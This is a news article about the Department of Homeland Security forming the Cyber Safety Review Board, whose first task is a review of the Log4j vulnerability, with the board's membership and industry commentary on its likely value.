The Department of Homeland Security (DHS) has launched a Cyber Safety Review Board, which will bring together private and public sector industry leaders to assess “significant cybersecurity events” with the aim of identifying and sharing the lessons learned from them.
The board's first assessment will be centered around the critical flaw discovered in the Apache Log4j logging library discovered late last year. It will be tasked with forming recommendations based on its review of this incident, as opposed to being a regulatory and enforcement authority.
“At the President’s direction, DHS is establishing the Cyber Safety Review Board to thoroughly assess past events, ask the hard questions, and drive improvements across the private and public sectors," said Secretary of Homeland Security Alejandro N. Mayorkas in a Thursday statement. "I look forward to reviewing the Board’s recommendations regarding how we can better protect communities across our country as DHS works to build a more secure digital future.”
The Log4j vulnerability (CVE-2021-44228) exists in a library that is incorporated widely into various Apache applications, meaning its reach impacts millions of third-party enterprise applications, cloud services and manufacturers. Even as vendors raced to issue updates addressing the flaw, researchers in December reported a “sharply increasing” number of exploitation attempts.
Board members will review and assess the Log4j vulnerability, how it is being exploited by various threat actors, and the actions taken by the government and private sector to mitigate the impact. In addition, the board will be tasked with making recommendations for addressing any ongoing flaws and threat activity related to the Log4j flaw, for improving cybersecurity and incident response practices, and for enhancing policies that are based on the lessons learned from the flaw. The board will deliver a public version of a report based on their findings over the summer.
“At the President’s direction, DHS is establishing the Cyber Safety Review Board to thoroughly assess past events, ask the hard questions, and drive improvements across the private and public sectors."
The board is made up of 15 members both from the private sector and government, led by Robert Silvers, DHS undersecretary for Policy, as Chair, and Heather Adkins, Google’s senior director for Security Engineering, as Deputy Chair. Other members include Chris Inglis, national cyber director with the Office of the National Cyber Director, Katie Moussouris, founder and CEO of Luta Security, Rob Joyce, director of cybersecurity with the National Security Agency and Kemba Walden, assistant general counsel of the Digital Crimes Unit with Microsoft. The Cybersecurity and Infrastructure Security Agency (CISA) will manage and fund the board, with CISA Director Jen Easterly in charge of appointing members and calling the board together following significant cybersecurity events.
The establishment of the board was mandated as part of President Joe Biden’s Executive Order (EO) 14028 on Improving the Nation’s Cybersecurity. Over the past year, the EO has resulted in several security-focused government initiatives, including a National Security Memorandum, signed in January, which aims to better secure the information systems that store and process classified data across various federal agencies; as well as a zero-trust implementation strategy developed and finalized in January.
“The new Cyber Safety Review Board looks like it could be quite valuable,” said Ray Kelly, fellow at NTT Application Security. “In-depth review of major security incidents with recommendations for remediation and incident response practices can certainly be useful for organizations. We’ll have to wait and see how the first report looks when they address the critical and ever-expanding Log4j vulnerability to determine if the level of detail and guidance is going to be helpful.”
Casey Ellis, founder and CTO at Bugcrowd, said the Log4j flaw revealed a "raft of adjacent and systemic weaknesses" on a large scale, such as open-source supply chain security, grappling with both unsophisticated and sophisticated adversaries simultaneously, as well as post-patch product recertification and regression analysis.
"Hopefully, the Cyber Safety Review Board will focus on these broader lessons and consequences, and not just Log4j itself," said Ellis.